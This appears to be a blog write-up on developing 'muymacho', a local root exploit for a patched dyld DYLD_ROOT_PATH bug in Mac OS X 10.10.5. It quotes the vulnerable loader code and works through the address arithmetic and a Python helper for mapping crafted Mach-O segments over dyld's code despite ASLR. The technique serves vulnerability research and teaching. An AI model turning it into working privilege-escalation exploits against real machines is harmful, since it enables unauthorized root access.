muymacho - exploiting DYLD_ROOT_PATH
muymacho is an exploit for a dyld bug present in Mac OS X 10.10.5 allowing local privilege escalation to root. It has been patched in El Capitan (10.11).
It was a fun bug and exploit to develop. This post is written as a guide through the process. You can follow along while viewing the dyld source. I hope you enjoy muymacho.
This post covers the various stages of developing the exploit from discovery, past potential problems, to the completed exploit.
- Discovery
- Vulnerability
- Exploit
- Bypassing ASLR
- Payload
- Finished exploit
- Patch
- Conclusion
- super sekret debug shellcode
- Appendix
Discovery
The bug was discovered during a source code audit of dyld-353.2.1 (10.10.0 to 10.10.4) and continued in IDA Pro with the binary release of the 10.10.5 update. Apple eventually released source for 10.10.5 on 9/17/2015. The post has been updated to include the newer dyld source code.
The interest in dyld came from a challenge @i0n1c posted on 7/20.
I found the bug relating to the DYLD_PRINT_TO_FILE environment variable and wrote an exploit. Shortly afterwards, i0n1c released his writeup and an exploit.
While I was hunting for the DYLD_PRINT_TO_FILE vulnerability, I spotted some questionable code. I went back and discovered a vulnerability related to DYLD_ROOT_PATH. I’m certainly not the first or only person to discover this vulnerability.
Note: I think that this vulnerability may have been assigned CVE-2015-5876 (credited to beist of grayhash). See the CVE number section in the appendix for more details.
The DYLD_ROOT_PATH vulnerability is the subject of this post and is detailed in the following sections. It has been patched in El Capitan.
dyld is the dynamic linker for Mac OS X and iOS. It works in conjunction with the system loader to prepare a process for execution. The basic steps are:
- The system loader maps both the binary’s pages and dyld into memory.
- Control is then handed over to dyld, so it can load and link other libraries and their dependencies into the process address space.
- The process loading is complete and execution begins at the executable’s entry point in memory.
During the execution of a suid binary, dyld is running with elevated privileges. The binary has not actually begun executing and thus cannot yet lower privileges.
For more details check out these references here and here (dyld is much more complex than summarized in this post).
The vulnerability is related to the use of the DYLD_ROOT_PATH environment variable. The following is an excerpt from the dyld man page:
DYLD_ROOT_PATH
This is a colon separated list of directories. The dynamic linker will prepend each of this directory paths to every image access until a file is found.
While the above statement is true, there is an additional use that appears to be undocumented. In order to understand the use, we need to digress into discussing the iOS simulator. Unlike Android which uses an emulator (executes ARM instructions), iOS uses a simulator that runs applications compiled for x86_64. One of the simulator steps replaces the built in dyld with a special iOS simulator version. The special version is creatively called dyld_sim.
In order to use dyld_sim, the DYLD_ROOT_PATH environment variable is set to a base directory before executing a program.
$ DYLD_ROOT_PATH=/Users/user/tmp crontab
The example above expects dyld_sim to be located off of the base directory at the following location:
/Users/user/tmp/usr/lib/dyld_sim
The details of the vulnerability are in the next section. However, spoiler alert, insufficient validation of the dyld_sim file is to blame. dyld_sim is a Mach-O file, but the exploit produces a dyld_sim that is just muymacho :)
Vulnerability
The majority of this analysis references dyld.cpp from dyld-353.2.3 (10.10.5), with the exception of the 10.10.4 section in the appendix. The bug appears to have been introduced in dyld-239.3 which coincides with the release of OS X 10.9.
The vulnerability is located in the dyld.cpp:useSimulatorDyld() function. If a dyld_sim file exists in the directory specified in the DYLD_ROOT_PATH variable, it’s opened and the resulting file descriptor is passed to useSimulatorDyld().
The code below shows the call from dyld.cpp:_main().
strlcat(simDyldPath, "/usr/lib/dyld_sim", PATH_MAX);
int fd = my_open(simDyldPath, O_RDONLY, 0);
if ( fd != -1 ) {
result = useSimulatorDyld(fd, mainExecutableMH, simDyldPath, argc, argv, envp, apple, startGlue);
if ( !result && (*startGlue == 0) )
halt("problem loading iOS simulator dyld");
The function useSimulatorDyld() is shown below in its entirety. It handles the parsing and loading of dyld_sim. It should be noted that any failures in useSimulatorDyld() cause the process to halt.
__attribute__((noinline))
static uintptr_t useSimulatorDyld(int fd, const macho_header* mainExecutableMH, const char* dyldPath,
int argc, const char* argv[], const char* envp[], const char* apple[], uintptr_t* startGlue)
{
*startGlue = 0;
// verify simulator dyld file is owned by root
struct stat sb;
if ( fstat(fd, &sb) == -1 )
return 0;
// read first page of dyld file
uint8_t firstPage[4096];
if ( pread(fd, firstPage, 4096, 0) != 4096 )
return 0;
// if fat file, pick matching slice
uint64_t fileOffset = 0;
uint64_t fileLength = sb.st_size;
const fat_header* fileStartAsFat = (fat_header*)firstPage;
if ( fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC) ) {
if ( !fatFindBest(fileStartAsFat, &fileOffset, &fileLength) )
return 0;
// re-read buffer from start of mach-o slice in fat file
if ( pread(fd, firstPage, 4096, fileOffset) != 4096 )
return 0;
}
else if ( !isCompatibleMachO(firstPage, dyldPath) ) {
return 0;
}
// calculate total size of dyld segments
const macho_header* mh = (const macho_header*)firstPage;
uintptr_t mappingSize = 0;
uintptr_t preferredLoadAddress = 0;
const uint32_t cmd_count = mh->ncmds;
const struct load_command* const cmds = (struct load_command*)(((char*)mh)+sizeof(macho_header));
const struct load_command* cmd = cmds;
for (uint32_t i = 0; i < cmd_count; ++i) {
switch (cmd->cmd) {
case LC_SEGMENT_COMMAND:
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
mappingSize += seg->vmsize;
if ( seg->fileoff == 0 )
preferredLoadAddress = seg->vmaddr;
}
break;
}
cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
}
// reserve space, then mmap each segment
vm_address_t loadAddress = 0;
uintptr_t entry = 0;
if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
return 0;
cmd = cmds;
struct linkedit_data_command* codeSigCmd = NULL;
for (uint32_t i = 0; i < cmd_count; ++i) {
switch (cmd->cmd) {
case LC_SEGMENT_COMMAND:
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
//dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
if ( segAddress == (void*)(-1) )
return 0;
}
break;
case LC_UNIXTHREAD:
{
#if __i386__
const i386_thread_state_t* registers = (i386_thread_state_t*)(((char*)cmd) + 16);
entry = (registers->__eip + loadAddress - preferredLoadAddress);
#elif __x86_64__
const x86_thread_state64_t* registers = (x86_thread_state64_t*)(((char*)cmd) + 16);
entry = (registers->__rip + loadAddress - preferredLoadAddress);
#endif
}
break;
case LC_CODE_SIGNATURE:
codeSigCmd = (struct linkedit_data_command*)cmd;
break;
}
cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
}
if ( codeSigCmd == NULL )
return 0;
fsignatures_t siginfo;
siginfo.fs_file_start=fileOffset; // start of mach-o slice in fat file
siginfo.fs_blob_start=(void*)(long)(codeSigCmd->dataoff); // start of code-signature in mach-o file
siginfo.fs_blob_size=codeSigCmd->datasize; // size of code-signature
int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
if ( result == -1 ) {
dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
return 0;
}
close(fd);
// notify debugger that dyld_sim is loaded
dyld_image_info info;
info.imageLoadAddress = (mach_header*)loadAddress;
info.imageFilePath = strdup(dyldPath);
info.imageFileModDate = sb.st_mtime;
addImagesToAllImages(1, &info);
dyld::gProcessInfo->notification(dyld_image_adding, 1, &info);
// jump into new simulator dyld
typedef uintptr_t (*sim_entry_proc_t)(int argc, const char* argv[], const char* envp[], const char* apple[],
const macho_header* mainExecutableMH, const macho_header* dyldMH, uintptr_t dyldSlide,
const dyld::SyscallHelpers* vtable, uintptr_t* startGlue);
sim_entry_proc_t newDyld = (sim_entry_proc_t)entry;
return (*newDyld)(argc, argv, envp, apple, mainExecutableMH, (macho_header*)loadAddress,
loadAddress - preferredLoadAddress,
&sSysCalls, startGlue);
}
The purpose of useSimulatorDyld() is to load dyld_sim, perform some validation, and then hand control over to it. dyld_sim begins execution and the original dyld will be no more.
As can be seen in the source above, useSimulatorDyld() does the following:
- Reads in Mach-O headers
- Loops through LC_SEGMENT_64 commands and determines total size
- vm_allocate() memory
- mmap() segments into memory
- Verifies the code signature
- Jumps into the dyld_sim entry point
muymacho exploits a DYLD_ROOT_PATH vulnerability present since 10.9. There was also an additional attack vector in versions up to 10.10.4, which was patched in the 10.10.5 update.
The astute reader will notice that the vulnerability is in the processing of dyld_sim’s Mach-O headers. A malformed Mach-O file allows memory segments to be replaced leading to arbitrary execution of code, which happens prior to signature verification.
In order to understand how the remapping is possible, we need a little review of Mach-O. Apple provides a full Mach-O reference document. However, the two relevant structures are shown below, with the most important one being segment_command_64.
/*
* The 64-bit mach header appears at the very beginning of object files for
* 64-bit architectures.
*/
struct mach_header_64 {
uint32_t magic; /* mach magic number identifier */
cpu_type_t cputype; /* cpu specifier */
cpu_subtype_t cpusubtype; /* machine specifier */
uint32_t filetype; /* type of file */
uint32_t ncmds; /* number of load commands */
uint32_t sizeofcmds; /* the size of all the load commands */
uint32_t flags; /* flags */
uint32_t reserved; /* reserved */
};
/*
* The 64-bit segment load command indicates that a part of this file is to be
* mapped into a 64-bit task's address space. If the 64-bit segment has
* sections then section_64 structures directly follow the 64-bit segment
* command and their size is reflected in cmdsize.
*/
struct segment_command_64 { /* for 64-bit architectures */
uint32_t cmd; /* LC_SEGMENT_64 */
uint32_t cmdsize; /* includes sizeof section_64 structs */
char segname[16]; /* segment name */
uint64_t vmaddr; /* memory address of this segment */
uint64_t vmsize; /* memory size of this segment */
uint64_t fileoff; /* file offset of this segment */
uint64_t filesize; /* amount to map from the file */
vm_prot_t maxprot; /* maximum VM protection */
vm_prot_t initprot; /* initial VM protection */
uint32_t nsects; /* number of sections in segment */
uint32_t flags; /* flags */
};
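As a quick sanity check on the two layouts above, their sizes can be computed with Python's struct module. This is a minimal sketch: the format strings are my own transcription of the fields shown, assuming little-endian packing with no padding.

```python
import struct

# Field-by-field transcription of the two structures (little-endian, unpadded).
MACH_HEADER_64 = "<8I"                  # magic .. reserved: eight 32-bit fields
SEGMENT_COMMAND_64 = "<II16sQQQQiiII"   # cmd, cmdsize, segname[16], vmaddr,
                                        # vmsize, fileoff, filesize, maxprot,
                                        # initprot, nsects, flags

header_size = struct.calcsize(MACH_HEADER_64)
segment_size = struct.calcsize(SEGMENT_COMMAND_64)
print(hex(header_size), segment_size)
```

These two sizes matter later, when working out how many segment commands fit in the single page that dyld reads.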
First useSimulatorDyld() needs to extract the Mach-O header. As can be seen in the source, there is some initial code to determine where the actual header is located in the case of a universal binary. dyld then reads in a page (0x1000 bytes) of data containing the Mach-O header.
After retrieving the header, useSimulatorDyld() processes the load commands. This is accomplished in two loops that cycle through load commands such as LC_SEGMENT_64, LC_UNIXTHREAD, and LC_CODE_SIGNATURE.
The first of the two processing loops is shown below. It looks at LC_SEGMENT_64 load commands. It calculates the total vmsize and determines preferredLoadAddress. If no segments have a fileoff of 0, preferredLoadAddress defaults to 0.
for (uint32_t i = 0; i < cmd_count; ++i) {
switch (cmd->cmd) {
case LC_SEGMENT_COMMAND: // <-- Note: defined in a macro as LC_SEGMENT_64
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
mappingSize += seg->vmsize;
if ( seg->fileoff == 0 )
preferredLoadAddress = seg->vmaddr;
}
break;
}
cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
}
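The behaviour of this loop can be modelled in a few lines of Python. This is only a sketch: Segment and first_pass are hypothetical names used for illustration, not part of dyld or muymacho.

```python
from collections import namedtuple

# Hypothetical stand-in for the segment_command_64 fields the loop reads.
Segment = namedtuple("Segment", "vmaddr vmsize fileoff")

def first_pass(segments):
    """Mirror the first loop: sum vmsize and pick preferredLoadAddress."""
    mapping_size = 0
    preferred_load_address = 0  # stays 0 unless some segment has fileoff == 0
    for seg in segments:
        mapping_size += seg.vmsize
        if seg.fileoff == 0:
            preferred_load_address = seg.vmaddr
    return mapping_size, preferred_load_address

# No segment here has fileoff == 0, so preferredLoadAddress keeps its default.
segs = [Segment(vmaddr=0x5000, vmsize=0x1000, fileoff=0x1000),
        Segment(vmaddr=0x9000, vmsize=0x2000, fileoff=0x2000)]
print(first_pass(segs))
```

Note that nothing ties the summed vmsize to the vmaddr values themselves, which is what the rest of the analysis relies on.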
vm_allocate() is called with the calculated mappingSize. The address of the allocated memory is stored in loadAddress. If the allocation fails, the useSimulatorDyld() function exits.
if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
return 0;
After allocating memory, the second loop is encountered and the relevant code can be seen below. This loop also parses LC_UNIXTHREAD and LC_CODE_SIGNATURE load commands, but they are not relevant to the vulnerability.
The load command that leads to exploitation is LC_SEGMENT_64.
case LC_SEGMENT_COMMAND: // <- this is defined in a macro as LC_SEGMENT_64
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
//dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
if ( segAddress == (void*)(-1) )
return 0;
}
Looking at the code, the intended function of the case statement is to map segments into the newly allocated memory. However, there is almost zero validation of the LC_SEGMENT_64 fields. Specifically, the code calculates a requestedLoadAddress based on controllable fields in a Mach-O binary.
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
preferredLoadAddress defaults to 0, leaving only loadAddress and seg->vmaddr in play. The following is a simplified equation that will be used throughout this post in various forms:
requestedLoadAddress = seg->vmaddr + loadAddress
seg->vmaddr is taken directly from the segment command and added to loadAddress (set by vm_allocate). This results in a partially controlled requestedLoadAddress which is then passed to mmap.
mmap is using some very interesting flags, in particular MAP_FIXED. The following is an excerpt from the mmap man page:
MAP_FIXED
Do not permit the system to select a different address than the one specified. If the specified address cannot be used, mmap() will fail. If MAP_FIXED is specified, addr must be a multiple of the pagesize. If a MAP_FIXED request is successful, the mapping established by mmap() replaces any previous mappings for the process’ pages in the range from addr to addr + len. Use of this option is discouraged.
The key words are “replaces any previous mappings”. Mappings such as heaps, the stack, and even executable pages can be replaced. An attacker can create a Mach-O file with crafted LC_SEGMENT_64 load commands. This provides not only partial control of requestedLoadAddress, but also full control of page permissions, filesize, and fileoff.
Manual testing within the debugger confirmed successful replacement of executable pages upon the return of the mmap system call.
Exploit
The following is a cheat sheet, providing a quick reference to various definitions and terms:
CHEAT SHEET
- loadAddress
- address returned by vm_allocate()
- vmaddr
- segment’s vmaddr value (seg->vmaddr)
- mmap_equation
- requestedLoadAddress = vmaddr + loadAddress
Given the ability to replace executable pages in memory, exploitation becomes relatively simple. ROP is not necessary since we control the content of the newly mapped executable pages. Our target page for remapping will be the page containing the mmap system call in dyld. If modern OS X did not have ASLR, this would be trivial. We first cover exploitation without ASLR, then cover how to bypass it.
Since dyld is the dynamic linker, it needs to be self contained. dyld includes all the system calls it uses. The useSimulatorDyld() function calls the ::mmap() function (wrapper) which in turn calls ___mmap().
00007FFF5FC2693E mov r12d, ecx
00007FFF5FC26941 mov r8d, r15d
00007FFF5FC26944 call ___mmap
00007FFF5FC26949 mov rbx, rax
00007FFF5FC2694C lea rax, ___syscall_logger
The ___mmap() function contains the mmap system call.
00007FFF5FC26DBC ___mmap proc near ; CODE XREF: _mmap+31p
00007FFF5FC26DBC mov eax, 20000C5h
00007FFF5FC26DC1 mov r10, rcx
00007FFF5FC26DC4 syscall
00007FFF5FC26DC6 jnb short locret_7FFF5FC26DD0
When the mmap system call returns, the instruction pointer will be at address 0x7fff5fc26dc6. Passing mmap a requestedLoadAddress of 0x7fff5fc26000 will replace our targeted mmap system call page. With the segment mapped in, the process begins executing our code.
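The target page and the in-page offset follow directly from the return address. A small sketch, assuming 4 KB pages (the variable names are mine):

```python
PAGE_SIZE = 0x1000

return_address = 0x7fff5fc26dc6  # instruction after the syscall in ___mmap

page_base = return_address & ~(PAGE_SIZE - 1)   # page that must be replaced
page_offset = return_address & (PAGE_SIZE - 1)  # where execution resumes in it
print(hex(page_base), hex(page_offset))
```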
As shown previously, the requestedLoadAddress is calculated in the second loop like so:
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
The simplified mmap_equation (preferredLoadAddress defaults to 0) is:
requestedLoadAddress = seg->vmaddr + loadAddress
If we recall, loadAddress is set by the call to vm_allocate. As shown below, vm_allocate returns an address located after the base program’s pages. For example, crontab generates the following memory map:
==== regions for process 44045 (non-writable and writable regions are interleaved)
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
mapped file 0000000100000000-0000000100005000 [ 20K] r-x/rwx SM=COW /Users/user/tmp/crontab
mapped file 0000000100005000-0000000100006000 [ 4K] rw-/rwx SM=COW /Users/user/tmp/crontab
mapped file 0000000100006000-0000000100009000 [ 12K] r--/rwx SM=COW /Users/user/tmp/crontab
VM_ALLOCATE (reserved) 0000000100009000-0000000100029000 [ 128K] rw-/rwx SM=NUL reserved VM address space (unallocated)
STACK GUARD 00007fff5bc00000-00007fff5f400000 [ 56.0M] ---/rwx SM=NUL stack guard for thread 0
Stack 00007fff5f400000-00007fff5fbff000 [ 8188K] rw-/rwx SM=PRV thread 0
Stack 00007fff5fbff000-00007fff5fc00000 [ 4K] rw-/rwx SM=COW
__TEXT 00007fff5fc00000-00007fff5fc37000 [ 220K] r-x/rwx SM=COW /usr/lib/dyld
__DATA 00007fff5fc37000-00007fff5fc3a000 [ 12K] rw-/rwx SM=COW /usr/lib/dyld
__DATA 00007fff5fc3a000-00007fff5fc70000 [ 216K] rw-/rwx SM=PRV /usr/lib/dyld
__LINKEDIT 00007fff5fc70000-00007fff5fc84000 [ 80K] r--/rwx SM=COW /usr/lib/dyld
shared memory 00007fffffe00000-00007fffffe01000 [ 4K] r--/r-- SM=SHM
shared memory 00007fffffeed000-00007fffffeee000 [ 4K] r-x/r-x SM=SHM
Given the memory map above, loadAddress is 0x100009000 (VM_ALLOCATE). Solving for seg->vmaddr results in 0x7ffe5fc1d000, which would replace the dyld executable page at 0x7fff5fc26000.
seg->vmaddr = requestedLoadAddress - loadAddress
seg->vmaddr = 0x7fff5fc26000 - 0x100009000
seg->vmaddr = 0x7ffe5fc1d000
We can craft a Mach-O file with a seg->vmaddr value of 0x7ffe5fc1d000 and the exploit would be done.
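The same arithmetic can be checked in Python. This is a sketch under the no-ASLR assumption of this section; requested_load_address is a hypothetical helper that mirrors the expression in the second loop, with a 64-bit mask standing in for uintptr_t wraparound.

```python
MASK64 = (1 << 64) - 1  # uintptr_t arithmetic wraps at 64 bits

def requested_load_address(vmaddr, load_address, preferred_load_address=0):
    """Python rendering of the address computed in the second loop."""
    return (vmaddr - preferred_load_address + load_address) & MASK64

load_address = 0x100009000         # VM_ALLOCATE region in the map above
dyld_target_page = 0x7fff5fc26000  # page holding the mmap syscall

# Solve the simplified equation for vmaddr, then plug it back in.
vmaddr = (dyld_target_page - load_address) & MASK64
print(hex(vmaddr))
print(hex(requested_load_address(vmaddr, load_address)))
```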
The above memory map and calculations do not include ASLR in order to simplify discussion. The next section delves into bypassing ASLR.
Bypassing ASLR
The following is an updated cheat sheet, providing a quick reference to various definitions and terms:
CHEAT SHEET
- loadAddress
- address returned by vm_allocate()
- vmaddr
- segment’s vmaddr value (seg->vmaddr)
- dyld_target
- dyld page we are targeting (contains the mmap syscall)
- mmap_equation
- requestedLoadAddress = vmaddr + loadAddress
- ASLR slide
- random offset applied to memory regions
- 0x0000000 to 0xffff000 bytes (0 to 0xffff pages)
The previous section ignores ASLR, which must be considered. ASLR adds slides to various memory regions including executable pages, stack, and the dyld executable pages. This is done to mitigate attacks since there aren’t set memory addresses for resources.
The following is an example of a memory layout with ASLR. Notice how dyld isn’t loaded at its preferred address, unlike in the previous vmmap output, and is in fact slid by 0x9f09000 bytes.
==== regions for process 44357 (non-writable and writable regions are interleaved)
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
mapped file 0000000102da7000-0000000102dac000 [ 20K] r-x/rwx SM=COW /usr/bin/crontab
mapped file 0000000102dac000-0000000102dad000 [ 4K] rw-/rwx SM=COW /usr/bin/crontab
mapped file 0000000102dad000-0000000102db0000 [ 12K] r--/rwx SM=COW /usr/bin/crontab
VM_ALLOCATE (reserved) 0000000102db0000-0000000102dd0000 [ 128K] rw-/rwx SM=NUL reserved VM address space (unallocated)
STACK GUARD 00007fff58e59000-00007fff5c659000 [ 56.0M] ---/rwx SM=NUL stack guard for thread 0
Stack 00007fff5c659000-00007fff5ce58000 [ 8188K] rw-/rwx SM=ZER thread 0
Stack 00007fff5ce58000-00007fff5ce59000 [ 4K] rw-/rwx SM=COW
__TEXT 00007fff69b09000-00007fff69b40000 [ 220K] r-x/rwx SM=COW /usr/lib/dyld
__DATA 00007fff69b40000-00007fff69b43000 [ 12K] rw-/rwx SM=COW /usr/lib/dyld
__DATA 00007fff69b43000-00007fff69b79000 [ 216K] rw-/rwx SM=PRV /usr/lib/dyld
__LINKEDIT 00007fff69b79000-00007fff69b8d000 [ 80K] r--/rwx SM=COW /usr/lib/dyld
shared memory 00007fffffe00000-00007fffffe01000 [ 4K] r--/r-- SM=SHM
shared memory 00007fffffeed000-00007fffffeee000 [ 4K] r-x/r-x SM=SHM
Other memory regions are slid as well. The base binary, crontab, has a 0x2da7000 byte slide. The same slide also applies to loadAddress (VM_ALLOCATE region).
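The slides can be read off by subtracting the start addresses in the first listing from those in the second. A minimal sketch; the dictionary below simply copies the relevant start addresses from the two vmmap outputs.

```python
# (start without ASLR, start with ASLR), taken from the two vmmap listings.
regions = {
    "crontab":     (0x100000000,    0x102da7000),
    "VM_ALLOCATE": (0x100009000,    0x102db0000),
    "dyld __TEXT": (0x7fff5fc00000, 0x7fff69b09000),
}

slides = {name: slid - base for name, (base, slid) in regions.items()}
for name, slide in slides.items():
    print(f"{name}: slide = {hex(slide)}")
```

The base binary and the VM_ALLOCATE region share one slide, while dyld gets its own independent one.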
Memory regions and ranges
The exploit section solves for the vmaddr value which when added to loadAddress replaces the dyld_target (0x7fff5fc26000) executable page. Our goal is unchanged, we want to map over the dyld_target page with our content. However, we are no longer working with set addresses. We are working with ranges of possible addresses.
Before formulating a plan of attack, we need to determine what the actual memory ranges are. Taking ASLR into account, the possible ranges become:
- loadAddress: 0x100009000 to 0x110008000 (max ASLR slide = 0x0ffff000)
- dyld_target: 0x7fff5fc26000 to 0x7fff6fc25000 (max ASLR slide = 0x0ffff000)
Next, we calculate vmaddr’s possible range of values. We want mmap to replace the dyld_target page, so dyld_target is substituted for requestedLoadAddress in the mmap_equation:
vmaddr = dyld_target - loadAddress
In order to determine the vmaddr range, we solve for both the minimum vmaddr as well as the maximum vmaddr. The following diagram should help illustrate how the range is calculated:
The left hand side of the diagram shows the minimum possible vmaddr. It uses the lowest possible dyld_target and the highest possible loadAddress.
vmaddr_min = (dyld_target + ASLR_slide_min) - (loadAddress + ASLR_slide_max)
vmaddr_min = (0x7fff5fc26000 + 0x00000000) - (0x100009000 + 0x0ffff000)
vmaddr_min = 0x7fff5fc26000 - 0x110008000
vmaddr_min = 0x7ffe4fc1e000
The right hand side of the diagram shows the maximum possible vmaddr. It uses the highest possible dyld_target and the lowest possible loadAddress.
vmaddr_max = (dyld_target + ASLR_slide_max) - (loadAddress + ASLR_slide_min)
vmaddr_max = (0x7fff5fc26000 + 0x0ffff000) - (0x100009000 + 0x00000000)
vmaddr_max = 0x7fff6fc25000 - 0x100009000
vmaddr_max = 0x7ffe6fc1c000
The vmaddr range is between 0x7ffe4fc1e000 and 0x7ffe6fc1c000. The entire range covers 0x1fffe000 bytes (twice the maximum ASLR slide).
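The range calculation above can be reproduced in a few lines. This is a sketch using the crontab values from this post; the constant names are mine.

```python
DYLD_TARGET = 0x7fff5fc26000   # unslid dyld_target page
LOAD_ADDRESS = 0x100009000     # unslid loadAddress for crontab
ASLR_SLIDE_MAX = 0x0ffff000

# Lowest target with highest loadAddress, and the reverse.
vmaddr_min = DYLD_TARGET - (LOAD_ADDRESS + ASLR_SLIDE_MAX)
vmaddr_max = (DYLD_TARGET + ASLR_SLIDE_MAX) - LOAD_ADDRESS
span = vmaddr_max - vmaddr_min
print(hex(vmaddr_min), hex(vmaddr_max), hex(span))
```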
In order to reliably exploit the vulnerability, the complete range of memory may need to be mapped in. It’s impractical to map the entire range in a single segment (nobody wants a 500+ MB exploit!), so we’ll use multiple segments.
Potential problems
At this point, we have to answer a few more questions :
- How many segments should be used?
- Can mmap fail?
- Can unwanted memory corruption occur?
How many segments should be used?
The Mach-O header is read in as only one page (0x1000 bytes). Given that the mach_header_64 structure is 0x20 (32) bytes and the segment_command_64 structure is 72 bytes, there can be a maximum of 56 segments. In order to simplify calculations, muymacho uses 32 segments. All the segments’ fileoff fields will point to the same data (0x1000000 bytes).
The 32 segments will cover the entire vmaddr range (0x1fffe000) with a page to spare.
TLDR: 32 segments
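Both numbers can be checked quickly. A minimal sketch, assuming the header page holds only the Mach-O header followed by segment commands, and counting the vmaddr range inclusively in pages:

```python
PAGE_SIZE = 0x1000
MACH_HEADER_64_SIZE = 0x20
SEGMENT_COMMAND_64_SIZE = 72

# How many segment commands fit after the header in one page.
max_segments = (PAGE_SIZE - MACH_HEADER_64_SIZE) // SEGMENT_COMMAND_64_SIZE

SEGMENT_BYTES = 0x1000000
VMADDR_MIN, VMADDR_MAX = 0x7ffe4fc1e000, 0x7ffe6fc1c000

pages_needed = (VMADDR_MAX - VMADDR_MIN) // PAGE_SIZE + 1  # inclusive range
pages_covered = 32 * SEGMENT_BYTES // PAGE_SIZE
print(max_segments, pages_covered - pages_needed)
```

The second value printed is the number of spare pages left over by 32 segments.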
Can mmap fail?
The portion of useSimulatorDyld()’s code that calls mmap is shown again below. Note that the useSimulatorDyld() function exits if the mmap call fails.
void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
//dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
if ( segAddress == (void*)(-1) )
return 0;
mmap will fail if it attempts to map memory outside of user space (greater than 0x7fffffffffff). We need to ensure that the following is true:
requestedLoadAddress + seg->filesize < 0x7fffffffffff
Due to ASLR, we don’t know the actual loadAddress and dyld_target addresses. We calculated the minimum (0x7ffe4fc1e000) and maximum (0x7ffe6fc1c000) vmaddr which define the range of offsets we must cover in order to negate ASLR.
To calculate the maximum possible requestedLoadAddress, we use the mmap_equation and plug in the maximum possible vmaddr and the maximum possible loadAddress.
requestedLoadAddress = vmaddr + loadAddress
requestedLoadAddress = 0x7ffe6fc1c000 + (loadAddress + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + (0x100009000 + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + 0x110008000
requestedLoadAddress = 0x7fff7fc24000
A requestedLoadAddress of 0x7fff7fc24000 is well within user space bounds. seg->filesize would need to be greater than 0x803dbfff for the mmap call to fail.
TLDR: mmap is fine :)
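The bound check can be written out as follows. This is a sketch using the worst-case values derived above; the constant names are mine.

```python
USER_SPACE_MAX = 0x7fffffffffff
VMADDR_MAX = 0x7ffe6fc1c000
LOAD_ADDRESS_MAX = 0x100009000 + 0x0ffff000  # unslid loadAddress + max slide
SEGMENT_BYTES = 0x1000000                    # filesize of each segment

highest_request = VMADDR_MAX + LOAD_ADDRESS_MAX
headroom = USER_SPACE_MAX - highest_request  # largest filesize that still fits
print(hex(highest_request), hex(headroom))
print(SEGMENT_BYTES < headroom)
```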
Can unwanted memory corruption occur?
Mapping in such large segments (0x1000000 bytes) may cause some concern. It really comes down to:
- Are we going to corrupt the stack while trying to replace dyld_target?
- What happens if we map over a portion of dyld’s pages?
The implementation section will show that muymacho uses a top down strategy. This approach ensures higher pages get replaced first followed by lower pages. The stack is lower than the dyld_target page in memory and at a safe distance. The stack is fine :)
It is possible that only some of dyld’s pages get mapped in by a segment. The rest of the pages would then be mapped in by the next segment. Does it matter? No.
The mmap system call, the wrapper function, and the majority of the parsing loop from useSimulatorDyld() are all contained in the dyld_target page. The rest of useSimulatorDyld() is at a lower page.
TLDR: everything is fine :)
Implementation
muymacho uses 32 segments to cover an address range of 0x20000000 bytes. This ensures that the entire ASLR memory range is covered. Segments will be mapped in until the dyld_target page is replaced, at which point our code takes control.
A top down strategy is used to prevent unnecessary memory corruption, in particular of the stack. The first segment uses the maximum vmaddr value. Subsequent segments use smaller values, allowing the entire range to be covered. The following graphic provides an example. Keep in mind that it is not to scale. dyld_target is one page while the segments are 4096 pages each.
Eventually dyld_target will be mapped and code execution is achieved. Once the dyld_target page is replaced, control will be instant upon the return of the mmap call.
Maximum vmaddr
The maximum vmaddr used in muymacho differs from what we previously calculated. The following function calculates the maximum vmaddr:
def maximum_vmaddr(segment_size):
    '''
    returns the maximum vmaddr
    the function assumes the base binary is 9 pages long
    as is the case for crontab giving a
    loadAddress_min of 0x100009000
    if attacking other suid programs, this value should
    be adjusted. in reality a few pages here or there
    won't have a noticeable effect.
    '''
    dyld_target = 0x7fff5fc26000
    loadAddress_min = 0x100009000
    aslr_slide_max = 0x0ffff000
    dyld_target_max = dyld_target + aslr_slide_max
    maximum_offset = dyld_target_max - loadAddress_min
    # Only one page from the payload needs to hit the maximum offset.
    vmaddr = maximum_offset - segment_size + 0x1000
    return vmaddr
The only difference is the following portion of code:
# Only one page from the payload needs to hit the maximum offset.
vmaddr = maximum_offset - segment_size + 0x1000
The original maximum vmaddr calculations assume we are mapping in a single page. We are actually mapping in 4096 pages at a time.
The calculation is adjusted to only map in one page at the maximum vmaddr, otherwise we are wasting pages that will never replace dyld_target.
The following graphic may help clarify the concept:
